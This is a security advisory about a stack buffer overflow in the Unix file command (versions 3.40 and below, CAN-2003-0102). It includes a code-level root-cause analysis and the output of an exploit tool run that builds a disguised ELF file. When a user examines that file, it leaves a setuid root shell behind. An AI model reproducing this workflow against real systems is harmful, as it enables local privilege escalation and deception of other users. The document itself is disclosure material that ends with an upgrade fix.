|
|
|
|
| |
File is a program used to determine file types by testing each argument in an attempt to classify it.
There are three sets of tests, performed in this order: filesystem tests, magic number tests, and language tests. The first test that succeeds causes the file type to be printed. The magic file usually resides in /usr/share/magic
A buffer overflow vulnerability allows a user to execute arbitrary commands under the privileges of another user (like root) by tricking the other user to use file on a specially made target file. |
| |
Credit:
See also: The iDefense Advisory.
Information was provided by iDefense.com and credited to an anonymous user.
|
| |
Vulnerable versions:
* file Versions 3.40 and below
Immune Versions:
* file Version 3.41 and above
usage example:
$ file unknown_file
unknown_file: MS-DOS executable (EXE), OS/2 or MS Windows
The attack works when the unsuspecting user tries to run:
$ file [exploit.file]
The crux of the problem lies in the following call to doshn() from
tryelf() on line 587 in readelf.c:
doshn(class, swap,
fd,
getu32(swap, elfhdr.e_shoff),
getu16(swap, elfhdr.e_shnum),
getu16(swap, elfhdr.e_shentsize));
The final argument to doshn() 'elfhdr.e_shentsize' is later used in a call
to read() as we see here (line 133 in readelf.c):
if (read(fd, sh_addr, size) == -1)
The call to read() will copy 'size' bytes into the variable 'sh_addr'
which is defined on line 92 in readelf.c:
#define sh_addr (class == ELFCLASS32 \
? (void *) &sh32 \
: (void *) &sh64)
The storage buffer used in the call to read() is of size 0x20 (32) bytes, by supplying a 'size' of 0x28 (40) a stack overflow occurs overwriting the stored frame pointer (EBP) and instruction pointer (EIP) thereby providing the attacker with CPU control and the ability to execute arbitrary code.
Exploit code:
First, create the file intended for the exploit:
$ ./mkfile_expl -C /tmp/suid -F /tmp/exploit -O "ASCII text" -R
/bin/bash -p 1
Local /usr/bin/file upto v3.39 exploit by anonymous
Using PRESET: 1 [Linux file <= 3.38 ]
Using FILENAME: /tmp/exploit
Using REAL_SHELL: /bin/bash
Using CREATED_SHELL: /tmp/suid
Using OUTPUT: ASCII text
Using RET_ADDR: 0xbfffc3f0
Using NOP_COUNT: 6000
Exploit created -> /tmp/exploit
Time to wait till somebody starts /usr/bin/file /tmp/exploit
Once the tainted file has been generated the attacker must wait for or coerce another user to examine the file with the file(1) command.
# ls -l exploit
-rwxr-xr-x 1 farmer farmer 6406 Jan 11 22:07 exploit
# file exploit
/tmp/exploit: ASCII text
The file(1) command reports that the examined file is "ASCII text" as the attacker specified in the creation of the exploit file. At this point if the attack was successful the original attack file (exploit) has been erased and a set user id shell has been created:
# ls -l exploit
ls: exploit: No such file or directory
$ ls -l suid
-rwsr-sr-x 1 root root 541096 Jan 11 22:07 suid
CVE:
CVE has assigned this problem the identification: CAN-2003-0102
Solution:
Download latest file version from vendor or from:
Version 3.41
Vendors will issue an upgrade individually.
|
|
|
|
|
|
|
